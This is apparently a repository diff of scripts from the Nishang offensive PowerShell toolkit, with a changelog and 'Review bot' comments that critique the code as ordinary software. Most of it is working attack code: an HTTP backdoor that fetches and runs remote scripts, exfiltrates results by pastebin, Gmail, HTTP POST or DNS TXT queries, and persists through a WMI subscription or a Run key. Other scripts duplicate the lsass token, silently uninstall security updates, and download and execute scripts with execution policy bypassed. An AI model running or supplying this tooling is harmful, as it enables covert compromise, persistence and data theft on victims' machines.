$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential($username, $password);
$msg.From = $username@gmail.com
$msg.To.Add($username@gmail.com)
$msg.Subject = $pastename
$msg.Body = $pastevalue
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
$Data
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$lengthofsubstr = 0
$code = Compress-Encode
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
}
}
'@
$modulename = "Execute-OnTime.ps1"
if($persist -eq $True)
{
$name = "persist.vbs"
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
if ($exfil -eq $True)
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
{
$scriptpath = $env:TEMP
$scriptFileName = "$scriptpath\$name"
$filterNS = "root\cimv2"
$wmiNS = "root\subscription"
$query = @"
Select * from __InstanceCreationEvent within 30
where targetInstance isa 'Win32_LogonSession'
"@
$filterName = "WindowsSanity"
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
}
else
{
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
}
}
else
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
if ($exfil -eq $True)
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
Invoke-Expression $env:TEMP\$modulename
}
}
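Review bot: In the persistence branch (`if($persist -eq $True)`), `$options` interpolates `$dev_key`, `$username` and `$password` and is appended in plaintext to `$env:TEMP\Execute-OnTime.ps1`, and the non-admin branch registers `$env:TEMP\persist.vbs` under `HKCU:Software\Microsoft\Windows\CurrentVersion\Run` as a value named `Update`; none of this is mentioned in the help, so document that credentials are written to disk and list the artifacts the script leaves behind (the two files in `%TEMP%`, the `Update` Run value, and the `root\subscription` `__EventFilter`, `ActiveScriptEventConsumer` and binding all named `WindowsSanity`). The non-admin `else` branch also rewrites `persist.vbs` with the same two `echo` lines already written just above the `IsInRole` check, so those duplicated lines can be dropped, and the bare `$Data` on its own line in the `webserver` branch emits the encoded blob to the pipeline as stray output.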


@ -0,0 +1,309 @@
<#
.SYNOPSIS
Nishang Payload which queries a URL for instructions and then downloads and executes a powershell script.
.DESCRIPTION
This payload queries the given URL and after a suitable command (given by MagicString variable) is found,
it downloads and executes a powershell script. The payload could be stopped remotely if the string at CheckURL matches
the string given in StopString variable.
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
.PARAMETER CheckURL
The URL which the payload would query for instructions.
.PARAMETER PayloadURL
The URL from where the powershell script would be downloaded.
.PARAMETER MagicString
The string which would act as an instruction to the payload to proceed with download and execute.
.PARAMETER StopString
The string which if found at CheckURL will stop the payload.
.PARAMETER persist
Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
.PARAMETER exfil
Use this parameter to use exfiltration methods for returning the results.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName
.Example
PS > HTTP-Backdoor
The payload will ask for all required options.
.EXAMPLE
PS > HTTP-Backdoor http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis
Use above when using the payload from non-interactive shells.
.EXAMPLE
PS > HTTP-Backdoor http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis -exfil -ExfilOption DNS -DomainName example.com -AuthNS <dns>
Use above command for using exfiltration methods.
.EXAMPLE
PS > HTTP-Backdoor -persist
Use above for reboot persistence.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
function HTTP-Backdoor
{
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
[Parameter(Parametersetname="exfil")]
[Switch]
$persist,
[Parameter(Parametersetname="exfil")]
[Switch]
$exfil,
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
[String]
$CheckURL,
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
[String]
$PayloadURL,
[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
[String]
$MagicString,
[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
[String]
$StopString,
[Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
[String]
$dev_key = "null",
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
[String]
$username = "null",
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
[String]
$password = "null",
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
[String]
$URL = "null",
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
[String]
$DomainName = "null",
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
[String]
$AuthNS = "null"
)
$body = @'
function HTTP-Backdoor-Logic ($CheckURL, $PayloadURL, $MagicString, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
{
while($true)
{
$exec = 0
start-sleep -seconds 5
$webclient = New-Object System.Net.WebClient
$filecontent = $webclient.DownloadString("$CheckURL")
if($filecontent -eq $MagicString)
{
$script:pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
$pastevalue
$exec++
if ($exfil -eq $True)
{
$pastename = $env:COMPUTERNAME + " Results of HTTP Backdoor: "
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
}
if ($exec -eq 1)
{
Start-Sleep -Seconds 60
}
}
elseif ($filecontent -eq $StopString)
{
break
}
}
}
'@
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
{
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $pastevalue)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($encdata)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$Compressed
}
if ($exfiloption -eq "pastebin")
{
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = smtp.gmail.com
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential($username, $password);
$msg.From = $username@gmail.com
$msg.To.Add($username@gmail.com)
$msg.Subject = $pastename
$msg.Body = $pastevalue
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$code = Compress-Encode
$lengthofsubstr = 0
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomaName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
}
}
'@
$modulename = "HTTP-Backdoor.ps1"
if($persist -eq $True)
{
$name = "persist.vbs"
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString"
if ($exfil -eq $True)
{
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
{
$scriptpath = $env:TEMP
$scriptFileName = "$scriptpath\$name"
$filterNS = "root\cimv2"
$wmiNS = "root\subscription"
$query = @"
Select * from __InstanceCreationEvent within 30
where targetInstance isa 'Win32_LogonSession'
"@
$filterName = "WindowsSanity"
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
}
else
{
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
}
}
else
{
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString"
if ($exfil -eq $True)
{
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
Invoke-Expression $env:TEMP\$modulename
}
}
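Review bot: `Do-Exfiltration` declares its last parameter as `$ExfilNS`, while the `DNS` branch, the help (`.PARAMETER AuthNS`) and the call in `HTTP-Backdoor-Logic` all use `$AuthNS`, so the DNS branch only sees a name server because `$AuthNS` leaks in from the caller through dynamic scoping; the same applies to `$pastevalue` inside `Compress-Encode` and to `$filename` in the `gmail` branch, which is never assigned anywhere in this file. Rename the parameter to `$AuthNS` and pass these values explicitly rather than relying on the enclosing scope. As in Execute-OnTime, `$options` writes `$username` and `$password` in plaintext into `$env:TEMP\HTTP-Backdoor.ps1`, and the persistence artifacts (`persist.vbs` in `%TEMP%`, the `Update` Run value, the `WindowsSanity` WMI filter, consumer and binding) should be documented in the help; the help also has "exfitration" for "exfiltration".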

108
aspx/nishang/CHANGELOG.txt Normal file

@ -0,0 +1,108 @@
0.3.6.4
- Get-PassHashes does not require SYSTEM privs anymore.
0.3.6.3
- Minor changes to Download-Execute-PS which now allows to pass arguments to scripts.
0.3.6.2
- Invoke-Encode can now output encoded command which could be used to execute scripts in a non-interactive shell.
0.3.6.1
- Powerpreter code made more readable.
- Powerpreter updated for recent changes done to other scripts in Nishang (Egress Testing, New Exfil methods, Bug fixes).
- Powerpreter persistence improved and bugs fixed.
- Bug fixes in HTTP-Backdoor and Execute_OnTime.
- Minor improvements to TextToExe and ExeToText scripts in Utility.
0.3.6
- Added Invoke-Encode.
- Changed compression and encoding methods used by Do-Exfitration, Backdoors, Invoke-Decode, Add-Exfiltration and Keylogger.
0.3.5
- Added Antak Webshell.
0.3.4
- Minor improvements in StringtoBase64.ps1
- Fixed a typo in Firelistener. Client port was not being displayed.
- All the scripts could be run using "dot source" now.
- All the scripts in Nishang could be loaded into current powershell session by importing Nishang.psm1 module.
- Added new exfiltration options, POST requests to Webserver and DNS txt queries.
- Removed exfiltration support for tinypaste.
- Exfiltration options have been removed from all scripts but Backdoors and Keylogger.
- Added Nishang.psm1
- Added Do-Exfiltration.ps1.
- Added Add-Exfiltration.ps1.
- Added Invoke-Decode.ps1.
- Removed Browse_Accept_Applet.ps1
0.3.3
- Minor bug fix in Copy-VSS.ps1
- Bug fix in Keylogger.ps1. It should log keys from a remote shell now (not powershell remoting).
0.3.2.2
- Download_Execute_PS.ps1 can now download and execute a Powershell script without writing it to disk.
- Execute_OnTime.ps1 and HTTP-Backdoor.ps1 executed the payload without downloading a file to disk.
- Fixed help in Brute-Force function in Powerpreter.
- Execute-OnTime, HTTP-Backdoor and Download-Execute-PS in Powerpreter now execute powershell scripts without downloading a file to disk.
- Added Firebuster.ps1 and Firelistener.ps1
0.3.2.1
- Fixed help and function name in Brute-Force.ps1
0.3.2
- Added Persistence to Keylogger, DNS_TXT_Pwnage, Execute_OnTime, HTTP-Backdoor and Powerpreter.
- Scirpts are now arranged in different directories.
- Added Add-Persistence.ps1 and Remove-Persistence.ps1
- Fixed minor bugs in scripts which use two parameterset.
- Invoke-NinjaCopy has been removed.
0.3.1
- Pivot now accepts multiple computers as input.
- Added Use-Session to interact with sessions created using Pivot.
0.3.0
- Added Powerpreter
- Added Execute-DNSTXT-Code
- Bug fix in Create-MultipleSessions.
- Changes to StringToBase64. It now supports Unicode encoding which makes it usable with -Encodedcommand.
- More Changes to StringToBase64. Now a file can be converted.
- Added Copy-VSS
- Information_Gather shows output in better format now.
- Information_Gather renamed to Get-Information.
- Wait for command renamed to HTTP-Backdoor.
- Time_Execution renamed Execute-OnTime
- Invoke-PingSweep renamed to Port-Scan
- Invoke-Medusa renamed to Brute-Force
0.2.9
- Run-EXEonRemote now accepts custom arguments for the executable.
- More examples added to the Keylogger.
0.2.8
- Fixed issues while using Get-LSASecret, Get-PassHashes, Get-WLAN-Keys and Information_Gather while using with Powershell v2
0.2.7
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely. Also, these does not stop autmoatically after running a script/command now.
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method.
- Fixed a minor bug in DNS_TXT_Pwnage.
- All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration.
- Added Get-PassHashes payload.
- Added Download-Execute-PS payload.
- The keylogger logs only fresh keys after exfiltring the keys 30 times.
- A delay after success has been introduced in various payloads which connect to the internet to avoid generating too much traffic.
0.2.6
- Added Create-MultipleSessions script.
- Added Run-EXEonRemote script.
0.2.5
- Added Get-WLAN-Keys payload.
- Added Remove-Update payload.
- Fixed help in Credentials.ps1
- Minor changes in Donwload_Execute and Information_Gather.
0.2.1
- Added Execute-Command-MSSQL payload.
- Removed Get-SqlSysLogin payload
- Fixed a bug in Credentials.ps1
0.2.0
- Removed hard coded strings from DNS TXT Pwnage payload.
- Information Gather now pastes data base64 encoded, does not trigger pastebin spam filter anymore.
- Credentials payload now validates both local and AD crdentials. If creds entered could not be validated locally or at AD, credential prompt is shown again.
- Base64ToString now asks for a file containing base64 string. To provide a string in place of file use "-IsString" parameter.
- Browse_Accept_Applet now handles prompts for both 32 bit and 64 bit Internet Explorer. The wait time for the applet to load has also been increased .
- Added Enable_DuplicateToken payload.
- Added Get-LSASecret payload.
- Added Get-SqlSysLogin payload.
- Added Invoke-Medusa payload.
- Added Invoke-PingSweep payload.
0.1.1
- Fixed a bug in Parse_Keys. The function Parse_Keys was not being called.
- Changed help in Wait_For_Command.ps1
- Fixed a bug in Wait_For_Command. $MagicString was not being used instead a fixed string was matched to the result of $checkurl
- Removed delay in the credentials payload's prompt. Now the prompt asking for credentials will keep appearing instantly if nothing is entered.
- Added CHANGELOG to repo
- Removed hard coded credentials from Credentials.ps1 :| and edited the code to accept user input.
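Review bot: Several entries have spelling errors that should be fixed before merge: "Do-Exfitration" (0.3.6), "Scirpts" (0.3.2), "autmoatically" and "exfiltring" (0.2.7), "Donwload_Execute" (0.2.5) and "crdentials" (0.2.0). The same scripts are also referred to under two names, "Execute_OnTime" (0.3.6.1, 0.3.2.2, 0.3.2) versus "Execute-OnTime" (0.3.0, 0.3.2.2) and "Download_Execute_PS.ps1" (0.3.2.2) versus "Download-Execute-PS" (0.3.6.3, 0.2.7); use the current script names consistently so each entry can be matched to a file in the repository.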


@ -0,0 +1,152 @@
<#
.SYNOPSIS
Nishang payload which duplicates the Access token of lsass and sets it in the current process thread.
.DESCRIPTION
This payload duplicates the Access token of lsass and sets it in the current process thread.
The payload must be run with elevated permissions.
.EXAMPLE
PS > Enable-DuplicateToken
.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/05/use-powershell-to-duplicate-process-tokens-via-p-invoke.aspx
https://github.com/samratashok/nishang
.NOTES
Goude 2012, TreuSec
#>
function Enable-DuplicateToken
{
[CmdletBinding()]
param()
$signature = @"
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct TokPriv1Luid
{
public int Count;
public long Luid;
public int Attr;
}
public const int SE_PRIVILEGE_ENABLED = 0x00000002;
public const int TOKEN_QUERY = 0x00000008;
public const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;
public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
public const UInt32 TOKEN_DUPLICATE = 0x0002;
public const UInt32 TOKEN_IMPERSONATE = 0x0004;
public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080;
public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100;
public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID);
public const string SE_TIME_ZONE_NAMETEXT = "SeTimeZonePrivilege";
public const int ANYSIZE_ARRAY = 1;
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
public UInt32 LowPart;
public UInt32 HighPart;
}
[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES {
public LUID Luid;
public UInt32 Attributes;
}
public struct TOKEN_PRIVILEGES {
public UInt32 PrivilegeCount;
[MarshalAs(UnmanagedType.ByValArray, SizeConst=ANYSIZE_ARRAY)]
public LUID_AND_ATTRIBUTES [] Privileges;
}
[DllImport("advapi32.dll", SetLastError=true)]
public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int
SECURITY_IMPERSONATION_LEVEL, out IntPtr DuplicateTokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetThreadToken(
IntPtr PHThread,
IntPtr Token
);
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool OpenProcessToken(IntPtr ProcessHandle,
UInt32 DesiredAccess, out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);
[DllImport("kernel32.dll", ExactSpelling = true)]
public static extern IntPtr GetCurrentProcess();
[DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
public static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,
ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
"@
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
Write-Warning "Run the Command as an Administrator"
Break
}
Add-Type -MemberDefinition $signature -Name AdjPriv -Namespace AdjPriv
$adjPriv = [AdjPriv.AdjPriv]
[long]$luid = 0
$tokPriv1Luid = New-Object AdjPriv.AdjPriv+TokPriv1Luid
$tokPriv1Luid.Count = 1
$tokPriv1Luid.Luid = $luid
$tokPriv1Luid.Attr = [AdjPriv.AdjPriv]::SE_PRIVILEGE_ENABLED
$retVal = $adjPriv::LookupPrivilegeValue($null, "SeDebugPrivilege", [ref]$tokPriv1Luid.Luid)
[IntPtr]$htoken = [IntPtr]::Zero
$retVal = $adjPriv::OpenProcessToken($adjPriv::GetCurrentProcess(), [AdjPriv.AdjPriv]::TOKEN_ALL_ACCESS, [ref]$htoken)
$tokenPrivileges = New-Object AdjPriv.AdjPriv+TOKEN_PRIVILEGES
$retVal = $adjPriv::AdjustTokenPrivileges($htoken, $false, [ref]$tokPriv1Luid, 12, [IntPtr]::Zero, [IntPtr]::Zero)
if(-not($retVal)) {
[System.Runtime.InteropServices.marshal]::GetLastWin32Error()
Break
}
$process = (Get-Process -Name lsass)
#$process.name
[IntPtr]$hlsasstoken = [IntPtr]::Zero
$retVal = $adjPriv::OpenProcessToken($process.Handle, ([AdjPriv.AdjPriv]::TOKEN_IMPERSONATE -BOR [AdjPriv.AdjPriv]::TOKEN_DUPLICATE), [ref]$hlsasstoken)
[IntPtr]$dulicateTokenHandle = [IntPtr]::Zero
$retVal = $adjPriv::DuplicateToken($hlsasstoken, 2, [ref]$dulicateTokenHandle)
$retval = $adjPriv::SetThreadToken([IntPtr]::Zero, $dulicateTokenHandle)
if(-not($retVal)) {
[System.Runtime.InteropServices.marshal]::GetLastWin32Error()
}
}
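Review bot: The return values of `LookupPrivilegeValue`, `OpenProcessToken` and `DuplicateToken` are assigned to `$retVal` but only inspected after `AdjustTokenPrivileges` and after `SetThreadToken`, so a failed `OpenProcessToken` on the lsass handle or a failed `DuplicateToken` still passes `[IntPtr]::Zero` into the next call and the `GetLastWin32Error` that is finally printed belongs to a different API; check each result where it is produced. The handles `$htoken`, `$hlsasstoken` and `$dulicateTokenHandle` (typo for "duplicate") are never released, so a `CloseHandle` import and cleanup are missing, and `$tokenPrivileges` is created from `TOKEN_PRIVILEGES` but never used, as is the `SE_TIME_ZONE_NAMETEXT` constant. `Get-Process -Name lsass` is also dereferenced as `$process.Handle` without confirming exactly one process object came back, and the `.NOTES` credit spells the company "TreuSec" while the `.LINK` points at truesec.com.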


@ -0,0 +1,83 @@
<#
.SYNOPSIS
Nishang Payload which silently removes updates for a target machine.
.DESCRIPTION
This payload removes updates from a target machine. This could be
used to remove all updates, all security updates or a particular update.
.PARAMETER KBID
THE KBID of update you want to remove. All and Security are also validd.
.EXAMPLE
PS > Remove-Update All
This removes all updates from the target.
.EXAMPLE
PS > Remove-Update Security
This removes all security updates from the target.
.EXAMPLE
PS > Remove-Update KB2761226
This removes KB2761226 from the target.
.LINK
http://trevorsullivan.net/2011/05/31/powershell-removing-software-updates-from-windows/
https://github.com/samratashok/nishang
#>
function Remove-Update {
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$KBID
)
$HotFixes = Get-HotFix
foreach ($HotFix in $HotFixes)
{
if ($KBID -eq $HotFix.HotfixId)
{
$KBID = $HotFix.HotfixId.Replace("KB", "")
$RemovalCommand = "wusa.exe /uninstall /kb:$KBID /quiet /norestart"
Write-Host "Removing $KBID from the target."
Invoke-Expression $RemovalCommand
break
}
if ($KBID -match "All")
{
$KBNumber = $HotFix.HotfixId.Replace("KB", "")
$RemovalCommand = "wusa.exe /uninstall /kb:$KBNumber /quiet /norestart"
Write-Host "Removing update $KBNumber from the target."
Invoke-Expression $RemovalCommand
}
if ($KBID -match "Security")
{
if ($HotFix.Description -match "Security")
{
$KBSecurity = $HotFix.HotfixId.Replace("KB", "")
$RemovalCommand = "wusa.exe /uninstall /kb:$KBSecurity /quiet /norestart"
Write-Host "Removing Security Update $KBSecurity from the target."
Invoke-Expression $RemovalCommand
}
}
while (@(Get-Process wusa -ErrorAction SilentlyContinue).Count -ne 0)
{
Start-Sleep 3
Write-Host "Waiting for update removal to finish ..."
}
}
}
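Review bot: `$KBID -match "All"` and `$KBID -match "Security"` are case-insensitive regular-expression matches, so any argument merely containing those substrings (a mistyped ID such as `KBAll`, or `install`) takes the bulk-removal path; compare with `-eq` against the `All`/`Security` keywords the help describes, or add a `[ValidateSet]`-style check, so a typo cannot uninstall every hotfix on the machine. In the single-KB path `$KBID` is overwritten with the stripped number before `break`, which only works because of the `break`; use a separate variable as the other two branches do. There is no handling for `wusa.exe` being absent or refusing the removal, and `/quiet /norestart` leaves a pending reboot the function never reports. Help text: "THE KBID" and "validd".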


@ -0,0 +1,67 @@
<#
.SYNOPSIS
Nishang Payload which downloads and executes a powershell script.
.DESCRIPTION
This payload downloads a powershell script from specified URL and then executes it on the target.
.PARAMETER ScriptURL
The URL from where the powershell script would be downloaded.
.PARAMETER Arguments
The Arguments to pass to the script when it is not downloaded to disk i.e. with -nodownload function.
.PARAMETER Nodownload
If this switch is used, the script is not dowloaded to the disk.
.EXAMPLE
PS > Download-Execute-PS http://pastebin.com/raw.php?i=jqP2vJ3x
.EXAMPLE
PS > Download-Execute-PS http://script.alteredsecurity.com/evilscript.ps1 -Argument evilscript -nodownload
The above command does not dowload the script file to disk and executes the evilscript function inside the evilscript.ps1
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
function Download-Execute-PS
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$ScriptURL,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$Arguments,
[Switch]
$nodownload
)
if ($nodownload -eq $true)
{
Invoke-Expression ((New-Object Net.WebClient).DownloadString("$ScriptURL"))
if($Arguments)
{
Invoke-Expression $Arguments
}
}
else
{
$webclient = New-Object System.Net.WebClient
$file1 = "$env:temp\deps.ps1"
$webclient.DownloadFile($ScriptURL,"$file1")
$script:pastevalue = powershell.exe -ExecutionPolicy Bypass -noLogo -command $file1
$pastevalue
}
}
